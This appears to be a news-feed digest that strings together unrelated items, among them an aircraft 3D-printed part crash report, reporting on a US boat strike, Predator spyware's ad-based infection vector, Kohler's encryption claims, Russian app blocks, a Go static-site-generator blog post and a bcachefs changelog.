A plane crashed after a 3D-printed part softened and collapsed, causing its engine to lose power, a report has found.

The Cozy Mk IV light aircraft was destroyed after its plastic air induction elbow, bought at an air show in North America, collapsed.

The aircraft crashed into a landing aid system at Gloucestershire Airport in Staverton on 18 March at 13:04 GMT, after its engine lost power. The sole occupant was taken to hospital with minor injuries.

The Air Accidents Investigation Branch (AAIB) said in a report that the induction elbow was made of "inappropriate material" and that safety actions will be taken in future regarding 3D-printed parts.


The part, which was 3D-printed, softened and collapsed

Following an "uneventful local flight", the AAIB report said the pilot advanced the throttle on the final approach to the runway, and realised the engine had suffered a complete loss of power.

"He managed to fly over a road and a line of bushes on the airfield boundary, but landed short and struck the instrument landing system before coming to rest at the side of the structure," the report read.

The report revealed the part had been installed during a modification to the fuel system and collapsed because its 3D-printed plastic material softened when exposed to heat from the engine.

The Light Aircraft Association (LAA) said it now intends to take safety actions in response to the accident, including an "LAA Alert" regarding the use of 3D-printed parts that will be sent to inspectors.


Video of U.S. Military Killing Boat Strike Survivors Is Horrifying, Lawmakers Reveal

Intercept
theintercept.com
2025-12-04 20:52:04
“What I saw in that room is one of the most troubling scenes I’ve ever seen in my time in public service.” The post Video of U.S. Military Killing Boat Strike Survivors Is Horrifying, Lawmakers Reveal appeared first on The Intercept....
Original Article

Lawmakers who saw a video of a U.S. attack on wounded and helpless people clinging to the wreckage of a supposed drug boat on September 2 described the footage as deeply disturbing.

A small number of members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees, as well as some staff directors, saw the recording during closed-door briefings Thursday with Adm. Frank M. Bradley , the head of Special Operations Command, and Gen. Dan Caine, the chair of the Joint Chiefs of Staff.

“What I saw in that room is one of the most troubling scenes I’ve ever seen in my time in public service,” said Rep. Jim Himes of Connecticut, the top Democrat on the House Intelligence Committee. “You have two individuals in clear distress without any means of locomotion with a destroyed vessel who were killed by the United States.”

Until Thursday, the only video of the attack that had been seen by lawmakers was an edited clip posted to the Truth Social account of President Donald Trump on September 2 announcing the strike. The edited clip captures the initial strike, showing a four-engine speedboat erupt in an explosion. It does not show the second strike on the wreckage of the vessel and the survivors — which was first reported by The Intercept .

Himes said the unedited video clearly shows the U.S. striking helpless people.

“Any American who sees the video that I saw will see the United States military attacking shipwrecked sailors.”

“Any American who sees the video that I saw will see the United States military attacking shipwrecked sailors — bad guys, bad guys, but attacking shipwrecked sailors,” he told The Intercept.

Himes said that Bradley — who conducted the follow-up strike as the then-commander of Joint Special Operations Command — “confirmed that there had not been a ‘kill them all’ order.” The Washington Post recently reported that Defense Secretary Pete Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”

Sen. Jack Reed of Rhode Island, the top Democrat on the Armed Services Committee, also expressed dismay after watching the footage. “I am deeply disturbed by what I saw this morning. The Department of Defense has no choice but to release the complete, unedited footage of the September 2 strike, as the President has agreed to do,” he said on Thursday.

“This briefing confirmed my worst fears about the nature of the Trump Administration’s military activities, and demonstrates exactly why the Senate Armed Services Committee has repeatedly requested — and been denied — fundamental information, documents, and facts about this operation. This must and will be the only beginning of our investigation into this incident,” said Reed.

Trump has said he supports the release of the video showing the second boat strike that killed the remaining survivors of the initial September 2 attack . “I don’t know what they have, but whatever they have, we’d certainly release, no problem,” Trump told reporters in the Oval Office on Wednesday.

Brian Finucane, a former State Department lawyer who is a specialist in counterterrorism issues and the laws of war, told The Intercept that intense scrutiny needs to extend far beyond the first strike in the U.S. operation in the waters near Venezuela.

“Oversight needs to be broader than this one incident. It needs to cover the entire maritime bombing campaign. And it needs to go beyond the Department of Defense,” he told The Intercept. “We need to know how this policy was formulated in the first instance. What was the process by which some aspect of it got legal blessing from the Justice Department’s Office of Legal Counsel? That all needs to be drug out into the open.”

The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 83 civilians . The most recent strike on a vessel was November 15.

Since the attacks began, experts in the laws of war and members of Congress, from both parties , have described the strikes as illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence. Throughout the long-running U.S. war on drugs , law enforcement agencies have arrested suspected drug smugglers rather than relying on summary executions. The double-tap strike first reported by The Intercept has only made worse a pattern of attacks that experts and lawmakers say are already tantamount to murder .

Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, cautioned against undue focus on the double-tap strike. “I can understand why the public and lawmakers are shocked by the second strike on Sept 2. The imagery of humans clinging to wreckage, likely severely injured, and then subsequently executed, is no doubt jarring. But we have to keep emphasizing to those who are conducting the strikes within DoD that there is no war, thus no law of war to protect them,” said Harrison, a former associate general counsel at the Pentagon’s Office of General Counsel, International Affairs. “All of the strikes, not just the Sept 2 incident, are extrajudicial killings of people alleged to have committed crimes. Americans should have been and should continue to be alarmed by that.”

The Pentagon continues to argue it is at war with undisclosed drug cartels and gangs. “I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Pentagon press secretary Kingsley Wilson said Tuesday .

“There is no such thing as a narco-terrorist,” Himes said on Thursday. “Apparently, we have enough evidence to kill these people, but we don’t have enough evidence to try them in a court of law. People ought to sort of let that sink in and think about the implications of that.”

“Apparently, we have enough evidence to kill these people, but we don’t have enough evidence to try them in a court of law.”

Sources briefed about the video footage say it contradicts a narrative that emerged in recent days that intercepted communications between the survivors and their supposed colleagues demonstrated those wounded individuals clinging to the wreckage were combatants, rather than shipwrecked and defenseless people whom it would be a war crime to target.

The Pentagon’s Law of War Manual is clear on attacking defenseless people. “Persons who have been rendered unconscious or otherwise incapacitated by wounds, sickness, or shipwreck, such that they are no longer capable of fighting, are hors de combat,” reads the guide using the French term for those out of combat. “Persons who have been incapacitated by wounds, sickness, or shipwreck are in a helpless state, and it would be dishonorable and inhumane to make them the object of attack.”

“The notion that radioing for help forfeits your shipwreck status is absurd — much less than it enables them to target you,” said Finucane. “I don’t believe there’s an armed conflict, so none of these people are lawful targets. They weren’t combatants, they’re not participating in hostilities. So the whole construct is ridiculous. But even if you accept that this is some sort of law of war situation, radioing for help does not deprive you of shipwreck status or render you a target under the law of war.”

Predator spyware uses new infection vector for zero-click attacks

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 20:47:42
The Predator spyware from surveillance company Intellexa has been using a zero-click infection mechanism dubbed "Aladdin" that compromised specific targets when simply viewing a malicious advertisement. [...]...
Original Article

Predator spyware uses new infection vector for zero-click attacks

The Predator spyware from surveillance company Intellexa has been using a zero-click infection mechanism dubbed “Aladdin,” which compromised specific targets by simply viewing a malicious advertisement.

This powerful and previously unknown infection vector is meticulously hidden behind shell companies spread across multiple countries, now uncovered in a new joint investigation by Inside Story , Haaretz , and WAV Research Collective .

The investigation is based on 'Intellexa Leaks' - a collection of leaked internal company documents and marketing material, and is corroborated by technical research from forensic and security experts at Amnesty International, Google, and Recorded Future.

Leaked Intellexa marketing material
Source: Amnesty International

Ad-based spyware delivery

First deployed in 2024 and believed to still be operational and actively developed, Aladdin leverages the commercial mobile advertising system to deliver malware.

The mechanism forces weaponized ads onto specific targets identified by their public IP address and other identifiers, instructing the ad platforms via a Demand Side Platform (DSP) to serve the ad on any website participating in the ad network.

“This malicious ad could be served on any website that displays ads, such as a trusted news website or mobile app, and would appear like any other ad that the target is likely to see,” explains Amnesty International’s Security Lab .

“Internal company materials explain that simply viewing the advertisement is enough to trigger the infection on the target’s device, without any need to click on the advertisement itself.”

Overview of Aladdin
Source: Amnesty International

Although no details are available on how the infection works, Google mentions that the ads trigger redirections to Intellexa’s exploit delivery servers.

The ads are funneled through a complex network of advertising firms spread across multiple countries, including Ireland, Germany, Switzerland, Greece, Cyprus, the UAE, and Hungary.

Recorded Future dug deeper into the advertising network, connecting the dots between key people, firms, and infrastructure, and naming some of those companies in its report .

Defending against those malicious ads is complex, but blocking ads on the browser would be a good starting point.

Another potential defense measure would be to set the browser to hide the public IP from trackers.

However, the leaked documents show that Intellexa can still obtain the information from domestic mobile operators in their client’s country.

Countries confirmed to host Predator activity
Source: Recorded Future

Samsung Exynos and zero-day exploits

Another key finding in the leak is confirmation of the existence of another delivery vector called 'Triton', which can target devices with Samsung Exynos chipsets using baseband exploits, forcing 2G downgrades to lay the groundwork for infection.

Amnesty International’s analysts are unsure whether this vector is still used and note that there are two other, possibly similar delivery mechanisms, codenamed 'Thor' and 'Oberon', believed to involve radio communications or physical access attacks.

Google’s researchers name Intellexa as one of the most prolific commercial spyware vendors in terms of zero-day exploitation, responsible for 15 out of the 70 cases of zero-day exploitation TAG discovered and documented since 2021.

Google says Intellexa develops its own exploits and also purchases exploit chains from external entities to cover the full spectrum of required targeting.

Despite sanctions and ongoing investigations against Intellexa in Greece, the spyware operator is as active as ever, according to Amnesty International.

As Predator becomes stealthier and harder to trace, users are recommended to consider enabling extra protection on their mobile devices, like Advanced Protection on Android and Lockdown Mode on iOS.


Kohler's Smart Toilet Camera Not Actually End-to-End Encrypted

404 Media
www.404media.co
2025-12-04 20:47:37
Gives new meaning to the 'internet of shit.'...
Original Article

Home goods company Kohler would like a bold look in your toilet to take some photos. It’s OK, though, the company has promised that all the data it collects on your “waste” will be “end-to-end encrypted.” However, a deeper look into the company’s claim by technologist Simon Fondrie-Teitler revealed that Kohler seems to have no idea what E2EE actually means. According to Fondrie-Teitler’s write-up , which was first reported by TechCrunch , the company will have access to the photos the camera takes and may even use them to train AI.

The whole fiasco gives an entirely too on-the-nose meaning to the “Internet of Shit.”

Kohler launched its $600 camera to hang on your toilet earlier this year. It’s called Dekoda, and along with the large price tag, the toilet cam also requires a monthly service fee that starts at $6.99. If you want to track the piss and shit of a family of six, you’ll have to pay $12.99 a month.

What do you get for putting a camera on your toilet? According to Kohler’s pitch , “health & wellness insights” about your gut health and “possible signs of blood in the bowl” as “Dekoda uses advanced sensors to passively analyze your waste in the background.”

If you’re squeamish about sending pictures of your family’s “waste” to Kohler, the company promised that all of the data is “end-to-end encrypted.” The privacy page for Kohler Health said “user data is encrypted end to end, at rest and in transit,” and the claim is repeated in several places in the marketing.

It’s not, though. Fondrie-Teitler told 404 Media he started looking into Dekoda after he noticed friends making fun of it in a Slack he’s part of. “I saw the ‘end-to-end encryption’ claim on the homepage, which seemed at odds with what they said they were collecting in the privacy policy,” he said. “Pretty much every other company I've seen implement end-to-end encryption has published a whitepaper alongside it. Which makes sense, the details really matter so telling people what you've done is important to build trust. Plus it's generally a bunch of work so companies want to brag about it. I couldn't find any more details though.”

E2EE has a specific meaning . It’s a type of messaging system that keeps the contents of a message private while in transit, meaning only the person sending and the person receiving a message can view it. Famously, E2EE means that the messaging company itself cannot decode or see the messages (Signal, for example, is E2EE). The point is to protect the privacy of individual users from a company prying into data if a third party, like the government, comes asking for it.

Kohler, it’s clear, has access to a user’s data. This means it’s not E2EE. Fondrie-Teitler told 404 Media that he downloaded the Kohler health app and analyzed the network traffic it sent. “I didn't see anything that would indicate an end-to-end encrypted connection being created,” he said.

Then he reached out to Kohler and had a conversation with its privacy team via email. “The Kohler Health app itself does not share data between users. Data is only shared between the user and Kohler Health,” a member of the privacy team at Kohler told Fondrie-Teitler in an email reviewed by 404 Media. “User data is encrypted at rest, when it’s stored on the user's mobile phone, toilet attachment, and on our systems.  Data in transit is also encrypted end-to-end, as it travels between the user's devices and our systems, where it is decrypted and processed to provide our service.”

If Kohler can view the user’s data, as it admits to doing in this email exchange with Fondrie-Teitler, then it’s not—by definition—using E2EE. Kohler did not immediately respond to 404 Media’s request for comment.

“I'd like the term ‘end-to-end encryption’ to not get watered down to just meaning ‘uses https’ so I wanted to see if I could confirm what it was actually doing and let people know,” Fondrie-Teitler told 404 Media. He pointed out that Zoom once made a similar claim and had to pay a fine to the FTC because of it.

“I think everyone has a right to privacy, and in order for that to be realized people need to have an understanding of what's happening with their data,” Fondrie-Teitler said. “It's already so hard for non-technical individuals (and even tech experts) to evaluate the privacy and security of the software and devices they're using. E2EE doesn't guarantee privacy or security, but it's a non-trivial positive signal and losing that will only make it harder for people to maintain control over their data.”

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.


Russia blocks Snapchat and restricts Apple’s FaceTime, state officials say

Guardian
www.theguardian.com
2025-12-04 20:46:07
Latest effort to control communications comes as regulator claims apps being used to ‘conduct terrorist activities’ Russian authorities blocked access to Snapchat and imposed restrictions on Apple’s video calling service, FaceTime, the latest step in an effort to tighten control over the internet an...
Original Article

Russian authorities blocked access to Snapchat and imposed restrictions on Apple’s video calling service, FaceTime, the latest step in an effort to tighten control over the internet and communications online, according to state-run news agencies and the country’s communications regulator.

The state internet regulator Roskomnadzor alleged in a statement that both apps were being “used to organize and conduct terrorist activities on the territory of the country, to recruit perpetrators [and] commit fraud and other crimes against our citizens”. Apple did not respond to an emailed request for comment, nor did Snap Inc.

The Russian regulator said it took action against Snapchat on 10 October, even though it only reported the move on Thursday. The moves follow restrictions against Google’s YouTube, Meta’s WhatsApp and Instagram, and the Telegram messaging service, itself founded by a Russian-born man, which came in the wake of Vladimir Putin’s invasion of Ukraine in 2022.

Under Vladimir Putin, authorities have engaged in deliberate and multi-pronged efforts to rein in the internet. They have adopted restrictive laws and banned websites and platforms that don’t comply. Technology has also been perfected to monitor and manipulate online traffic.

Access to YouTube was disrupted last year in what experts called deliberate throttling of the widely popular site by the authorities. The Kremlin blamed YouTube owner Google for not properly maintaining its hardware in Russia.

While it’s still possible to circumvent some of the restrictions by using virtual private network services, those are routinely blocked, too.

Authorities further restricted internet access this summer with widespread shutdowns of cellphone internet connections. Officials have insisted the measure was needed to thwart Ukrainian drone attacks, but experts argued it was another step to tighten internet control. In dozens of regions, “white lists” of government-approved sites and services that are supposed to function despite a shutdown have been introduced.

The government has also acted against popular messaging platforms. The encrypted messenger Signal and another popular app, Viber, were blocked in 2024. This year, authorities banned calls via WhatsApp, the most popular messaging app in Russia, and Telegram, a close second. Roskomnadzor justified the measure by saying the two apps were being used for criminal activities.

At the same time, authorities actively promoted a “national” messenger app called Max, which critics see as a surveillance tool. The platform, touted by developers and officials as a one-stop shop for messaging, online government services, making payments and more, openly declares it will share user data with authorities upon request. Experts also say it does not use end-to-end encryption.

Earlier this week, the government also said it was blocking Roblox, a popular online game platform, saying the step was aimed at protecting children from illicit content and “pedophiles who meet minors directly in the game’s chats and then move on to real life”. Roblox in October was the second most popular game platform in Russia, with nearly 8 million monthly users, according to the media monitoring group Mediascope.


Stanislav Seleznev, cyber security expert and lawyer with the Net Freedom rights group, said that Russian law views any platform where users can message each other as “organizers of dissemination of information”.

This label mandates that platforms register an account with Roskomnadzor so that the regulator can communicate its demands, and that they give Russia's security service, the FSB, access to their users' accounts for monitoring; those failing to comply are in violation and can be blocked, Seleznev said.

Seleznev estimated that possibly tens of millions of Russians have been using FaceTime, especially after calls were banned on WhatsApp and Telegram. He called the restrictions against the service “predictable” and warned that other sites failing to cooperate with Roskomnadzor “will be blocked – that’s obvious”.

][ Hello blog

Lobsters
nobloat.org
2025-12-04 20:42:13
Comments...
Original Article

I stumbled across the Refactoring English book this summer. This got me motivated to try (technical) writing myself. However, I needed a simple way to publish blog posts, and an excuse why I can't start writing immediately. So, me being in developer mode, I told myself:

"First things first, instead of practicing my writing, reading the book or sketching drafts of what I actually could write about, start with a custom static site generator."

But this now became the first article here on nobloat.org and I like it.

TL;DR

This blog is generated by 400 lines of handwritten Go code, mainly because it is fun, but also because I was annoyed by all the breaking changes with each update of existing solutions.

This can't happen anymore :)

My mental image of writing

The static site generator ecosystem is vast, but most solutions come with significant complexity. From a writing perspective, the biggest issue was in fact getting a setup that works without distraction and looks good to me.

Hugo is fast and popular and I have used it in the past already. But it's a massive framework with hundreds of features I'd never use but still have to pay for in complexity tokens. The configuration files, theme system, and plugin ecosystem add layers of abstraction that make it hard to understand what's actually happening. When something breaks or I want to customize behavior, there is too much for me to reason about. And I have had issues in the past where untouched static websites suddenly would no longer build after one or two years.

Jekyll requires Ruby, Bundler, and a complex gem ecosystem. Every time I'd want to update or deploy, I'd need to ensure the right Ruby version, manage gem dependencies, and deal with potential version conflicts. The overhead of maintaining a Ruby environment just to generate static HTML felt excessive. The same issue applies to Pelican, just with Python instead of Ruby.

Next.js and other React-based static site generators are powerful, but they bring the entire JavaScript ecosystem with them. Node modules, build tools, transpilation, and the constant churn of the npm ecosystem—all for what is essentially text processing and template rendering.

Even simpler tools like Zola or 11ty still require learning their specific conventions, configuration formats, and template languages. They're better than the heavyweights, but they're still frameworks with their own abstractions.

What I needed was:

  • Write Markdown files.
  • Run a simple command, get HTML.
  • Everything should be in Git, work with text editors, and require no setup beyond having Go installed.
  • No configuration files, no theme system, no plugin architecture I would need to learn first.

None of the existing solutions met these requirements. They either required complex setup, had too many dependencies, introduced unnecessary abstractions, or were too opinionated about structure. Plus this might be a fun project for a sunny afternoon in the park.

Image of me in the park reading the refactoring english book

The implementation consists of two Go files: main.go (core functionality) and data.go (site configuration), with no external dependencies beyond the standard library. It reads Markdown files, converts them to HTML, generates an index page, creates an RSS feed, and outputs everything to a public/ directory. The entire codebase is under 400 lines and does exactly what I need, nothing more.

How it works

The blog generator follows a simple workflow:

1. Content Structure

Posts are Markdown files in the articles/ directory, named with a date prefix: YYYY-MM-DD-title.md. The date prefix serves two purposes: it provides the publication date for sorting and RSS feeds, and it makes chronological organization obvious when browsing files.

articles/
  2025-07-01-hello-blog.md
  2025-12-03-x-platform-translation-system.md

The first line of each Markdown file is treated as the title (a # Heading), and the rest is converted to HTML content.

2. Markdown to HTML conversion

The markdown parser is intentionally minimal. It handles:

  • Headings ( # , ## , ### )
  • Paragraphs
  • Lists ( - item )
  • Inline formatting ( bold , italic , code , links, images)
  • Code blocks with syntax highlighting classes
  • Automatic anchor generation for ## headings

The parser steps through each line of the Markdown file and converts the supported expressions into HTML. For lists and code blocks, it keeps track of whether it is still inside a list or a code snippet.

The code snippet is a bit shortened to only show the relevant parts.

func parseMarkdown(input string) (content string, title string) {
	lines := strings.Split(input, "\n")
	var out strings.Builder
	inList := false
	inCode := false
	codeLang := ""

	if len(lines) > 0 && strings.HasPrefix(lines[0], "# ") {
		title = strings.TrimPrefix(lines[0], "# ")
	}

	for _, raw := range lines {
		line := strings.TrimSpace(raw)
		if strings.HasPrefix(line, "```") {
			if inCode {
				out.WriteString("</code></pre>\n")
				inCode = false
				continue
			}
			inCode = true
			codeLang = strings.TrimSpace(strings.TrimPrefix(line, "```"))
			if codeLang == "" {
				out.WriteString("<pre><code>")
			} else {
				out.WriteString(fmt.Sprintf("<pre><code class=\"language-%s\">", codeLang))
			}
			continue
		}
		if inCode {
			out.WriteString(html.EscapeString(raw) + "\n")
			continue
		}
		if inList && line == "" {
			out.WriteString("</ul>\n")
			inList = false
			continue
		}
		switch {
		case strings.HasPrefix(line, "> "):
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
			quote := formatInline(strings.TrimPrefix(line, "> "))
			out.WriteString("<blockquote><p>" + quote + "</p></blockquote>\n")
		case strings.HasPrefix(line, "# "):
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
			heading := formatInline(strings.TrimPrefix(line, "# "))
			out.WriteString("<h1>" + heading  + "</h1>\n")
		case strings.HasPrefix(line, "- "):
			if !inList {
				out.WriteString("<ul>\n")
				inList = true
			}
			item := formatInline(strings.TrimPrefix(line, "- "))
			out.WriteString("<li>" + item + "</li>\n")
		case line == "":
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
		default:
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
			out.WriteString("<p>" + formatInline(line) + "</p>\n")
		}
	}

	if inList {
		out.WriteString("</ul>\n")
	}
	if inCode {
		out.WriteString("</code></pre>\n")
	}

	return out.String(), title
}
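
The snippet calls a formatInline helper that is not shown above. A minimal sketch of what such a helper could look like (the regular expressions here are illustrative, not necessarily the ones this generator uses):

import (
	"html"
	"regexp"
)

var (
	reCode   = regexp.MustCompile("`([^`]+)`")
	reBold   = regexp.MustCompile(`\*\*([^*]+)\*\*`)
	reItalic = regexp.MustCompile(`\*([^*]+)\*`)
	reLink   = regexp.MustCompile(`\[([^\]]+)\]\(([^)]+)\)`)
)

// formatInline escapes a line of text and rewrites the supported inline
// markdown expressions (code, bold, italic, links) into HTML tags.
// Bold must run before italic so ** is not consumed as two single *.
func formatInline(s string) string {
	s = html.EscapeString(s)
	s = reCode.ReplaceAllString(s, "<code>$1</code>")
	s = reBold.ReplaceAllString(s, "<b>$1</b>")
	s = reItalic.ReplaceAllString(s, "<i>$1</i>")
	s = reLink.ReplaceAllString(s, `<a href="$2">$1</a>`)
	return s
}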

3. Post Loading and Sorting

The loadPosts() function scans the articles directory, reads each .md file, parses the date from the filename prefix, converts Markdown to HTML, and sorts posts by date in descending order (newest first).

func loadPosts(dir string) []Post {
    files, _ := os.ReadDir(dir)
    var posts []Post
    for _, f := range files {
        if !strings.HasSuffix(f.Name(), ".md") {
            continue
        }
        // Parse date from filename: YYYY-MM-DD-title.md
        if len(f.Name()) < len("YYYY-MM-DD-") {
            log.Printf("skipping %s: missing date prefix", f.Name())
            continue
        }
        dateStr := f.Name()[:10]
        postDate, err := time.Parse("2006-01-02", dateStr)
        if err != nil {
            log.Printf("skipping %s: invalid date prefix: %v", f.Name(), err)
            continue
        }
        // Read the file and convert markdown to HTML (omitted here)
        posts = append(posts, Post{Date: postDate})
    }
    // Sort by date, newest first
    sort.Slice(posts, func(i, j int) bool {
        return posts[i].Date.After(posts[j].Date)
    })
    return posts
}

If a file doesn't match the expected format, it logs a warning and skips it, ensuring only properly formatted posts are included.

4. HTML and RSS Feed Generation

The generator creates three types of HTML:

Index Page ( index.html ): Lists all posts with links, plus a links section for external resources.

Post Pages ( YYYY-MM-DD-title.html ): Individual post pages with navigation back to the index.

RSS Feed ( feed.xml ): Standard Atom feed for RSS readers.

All HTML is generated using Go's html/template package, which is part of the standard library. Templates are read from simple HTML files (index.html and article.html) that use Go's template syntax—no complex template system, just straightforward HTML with template variables.
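
As a rough, self-contained sketch of that rendering step (the template string and Post fields here are illustrative; the real generator reads index.html and article.html from disk):

package main

import (
	"html/template"
	"os"
	"time"
)

type Post struct {
	Title   string
	Date    time.Time
	Content template.HTML // already-converted HTML body, inserted unescaped
}

func main() {
	// An inline template keeps this sketch runnable on its own;
	// the real generator parses article.html instead.
	tmpl := template.Must(template.New("article").Parse(
		`<h1>{{.Title}}</h1><time>{{.Date.Format "2006-01-02"}}</time>{{.Content}}`))
	post := Post{Title: "Hello blog", Date: time.Now(), Content: "<p>Hi</p>"}
	// Write to stdout here; the generator writes to public/YYYY-MM-DD-title.html.
	if err := tmpl.Execute(os.Stdout, post); err != nil {
		panic(err)
	}
}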

5. Configuration

Site metadata is stored in data.go as a simple Go struct. This includes the site title, slogan, base URL, links, projects, and tools that appear on the index page. The configuration is just a variable declaration: no YAML, no JSON, no complex config parsing.

To change the site title or add a link, I just edit data.go directly.

var config = Config{
    Title:   "][ nobloat.org",
    Slogan:  "pragmatic software minimalism",
    BaseURL: "https://nobloat.org",
    Links: map[string]string{
        "Choosing boring technology": "https://boringtechnology.club/",
        // ...
    },
    // ...
}

6. File Watching (Optional)

For development, the main.go includes a --watch flag that uses the fsnotify package to monitor the articles directory, CSS file, template files, and the generator itself. When any file changes, it automatically rebuilds the site.

When you modify content, templates, or CSS, changes are detected immediately and the site rebuilds automatically. Edit a post, see it update. Modify the HTML templates, get instant feedback. Change the stylesheet, see the new styles applied.

It does not, however, detect changes to the *.go files themselves, because that would require a slightly more complex restart mechanism, and I rarely touch them anyway.

This is the only external dependency (github.com/fsnotify/fsnotify), and it's only needed for the watch feature. The core build functionality requires no external packages.
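
A minimal sketch of what such a watch loop can look like with fsnotify (the watched paths and the rebuild hook are illustrative):

package main

import (
	"log"

	"github.com/fsnotify/fsnotify"
)

func main() {
	watcher, err := fsnotify.NewWatcher()
	if err != nil {
		log.Fatal(err)
	}
	defer watcher.Close()

	// Watch the content and asset locations; fsnotify watches directories
	// non-recursively, so each path is added explicitly.
	for _, path := range []string{"articles", "style.css", "index.html", "article.html"} {
		if err := watcher.Add(path); err != nil {
			log.Fatal(err)
		}
	}

	for {
		select {
		case ev, ok := <-watcher.Events:
			if !ok {
				return
			}
			log.Println("change detected:", ev.Name)
			// rebuild() // regenerate everything into public/
		case err, ok := <-watcher.Errors:
			if !ok {
				return
			}
			log.Println("watch error:", err)
		}
	}
}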

Conclusion

This blog generator does exactly what I need: converts Markdown to HTML, generates an index and RSS feed, and outputs static files. It's under 400 lines of code, uses only the Go standard library for core functionality, and I understand every part of it.

It might not be suitable for someone who needs complex features like tags, categories, pagination, or theme systems. But for a simple blog, it's perfect. It fits the "nobloat" philosophy .

The entire codebase is very small, making it easy to read, modify, and maintain.

And the best part for me personally: I don't need node, npm or similar tools to build this. Local preview is just opening public/index.html in Firefox. Deployment is a single rsync:

rsync -av --delete public/ user@host:html/blog/

I do have a few ideas for further topics to write about in the context of nobloat. Taking the courage to publish this was the biggest step for me.

Feedback is always welcome at dev@spiessknafl.at

Fairphone open-sources Fairphone 5 and 6 software, and Moments switch

Lobsters
www.fairphone.com
2025-12-04 20:41:13
Comments...

bcachefs 1.33.0 - reconcile

Lobsters
lore.kernel.org
2025-12-04 20:04:42
Comments...
Original Article
From: Kent Overstreet <kent.overstreet@linux.dev>
To: linux-bcachefs@vger.kernel.org
Subject: bcachefs 1.33.0 - reconcile
Date: Thu, 4 Dec 2025 12:35:59 -0500	[thread overview]
Message-ID: <slvis5ybvo7ch3vxh5yb6turapyq7hai2tddwjriicfxqivnpn@xdpb25wey5xd> (raw)

Biggest new feature in the past ~2 years, I believe. The user facing
stuff may be short and sweet - but so much going on under the hood to
make all this smooth and polished.

Big thank you to everyone who helped out with testing, design feedback,
and more.

As always, keep the bug reports coming - you find 'em, we fix em :)

Cheers,
Kent


Changelog:
==========

`bcachefs_metadata_version_reconcile` (formerly known as rebalance_v2)

### Reconcile

An incompatible upgrade is required to enable reconcile.

Reconcile now handles all IO path options; previously only the background target
and background compression options were handled.

Reconcile can now process metadata (moving it to the correct target,
rereplicating degraded metadata); previously rebalance was only able to handle
user data.

Reconcile now automatically reacts to option changes and device setting
changes, and immediately rereplicates degraded data or metadata.

This obsoletes the commands `data rereplicate`, `data job
drop_extra_replicas`, and others; the new commands are `reconcile status` and
`reconcile wait`.

The recovery pass `check_reconcile_work` now checks that data matches the
specified IO path options, and flags an error if it does not (if it wasn't due
to an option change that hasn't yet been propagated).

Additional improvements over rebalance and implementation notes:

We now have a separate index for data that's scheduled to be processed by
reconcile but can't (e.g. because the specified target is full),
`BTREE_ID_reconcile_pending`; this solves long standing reports of rebalance
spinning when a filesystem has more data than fits on the specified background
target.

This also means you can create a single device filesystem with replicas=2, and
upon adding a new device data will automatically be replicated on the new
device, no additional user intervention required.

There's a separate index for "high priority" reconcile processing -
`BTREE_ID_reconcile_hipri`. This is used for degraded extents that need to be
rereplicated; they'll be processed ahead of other work.

Rotating disks get special handling. We now track whether a disk is rotational
(a hard drive, instead of an SSD); pending work on those disks is additionally
indexed in the `BTREE_ID_reconcile_work_phys` and
`BTREE_ID_reconcile_hipri_phys` btrees so they can be processed in physical
LBA order, not logical key order, avoiding unnecessary seeks.

We don't yet have the ability to change the rotational setting on an existing
device, once it's been set; if you discover you need this, please let us know so
it can be bumped up on the list (it'll be a medium sized project).

`BCH_MEMBER_STATE_failed` has been renamed to `BCH_MEMBER_STATE_evacuating`;
as the name implies, reconcile automatically moves data off of devices in the
evacuating state. In the future, when we have better tracking and monitoring
of drive health, we'll be able to automatically mark failing devices as
evacuating: when this lands, you'll be able to load up a server with disks and
walk away - and come back a year later to swap out the ones that have failed.

Reconcile was a massive project: the short and simple user interface is
deceptive, there was an enormous amount of work under the hood to make
everything work consistently and handle all the special cases we've learned
about over the past few years with rebalance.

There's still reconcile-related work to be done on disk space accounting when
devices are read-only or evacuating, and in the future we want to reserve space
up front on option change, so that we can alert the user if they might be doing
something they don't have disk space for.

### Other improvements and changes:

- Degraded data is now always properly reported as degraded (by `bcachefs fs
  usage`); data is considered degraded any time the durability on good
  (non-evacuating) devices is less than the specified replication level.

- Counters (shown by `bcachefs fs top`) and tracepoints have gotten a giant
  cleanup and rework: every counter has a corresponding tracepoint. This makes
  it easy to drill down and investigate when a filesystem is doing something
  unusual and unexpected.

  Under the hood, the conversion of tracepoints to printbufs/pretty printers has
  now been completed, with some much improved helpers. This makes it much easier
  to add new counters and tracepoints or add additional info to existing
  tracepoints, typically a 5-20 line patch. If there's something you're
  investigating and you need more info, just ask.

  We now make use of type information on counters to display data rates in
  `bcachefs fs top` where applicable, and many counters have been converted to
  data rates. This makes it much easier to correlate different counters (e.g.
  `data_update`, `data_update_fail`) to check if the rates of slowpath events
  should be a cause for concern.

- Logging/error message improvements

  Logging has been a major area of focus, with a lot of under the hood
  improvements to make it ergonomic to generate messages that clearly explain
what the system is doing and why: error messages should not include just the
  error, but how it was handled (soft error or hard error) and all actions taken
  to correct the error (e.g. scheduling self healing or recovery passes).

  When we receive an IO error from the block layer we now report the specific
  error code we received (e.g. `BLK_STS_IOERR`, `BLK_STS_INVAL`).

  The various write paths (user data, btree, journal) now report one error
  message for the entire operation that includes all the sub-errors for the
  individual replicated writes and the status of the overall operation (soft
  error (wrote degraded data) vs. hard error), like the read paths.

  On failure to mount due to insufficient devices, we now report which device(s)
  were missing; we remember the device name and model in the superblock from the
  last time we saw it so that we can give helpful hints to the user about what's
  missing.

  When btree topology repair recovers via btree node scan, we now report which
  node(s) it was able to recover via scan; this helps with determining if data
  was actually lost or not.

  We now ratelimit soft and hard errors separately, in the data/journal/btree
  read and write paths, ensuring that if the system is being flooded with soft
  errors the hard errors will still be reported.

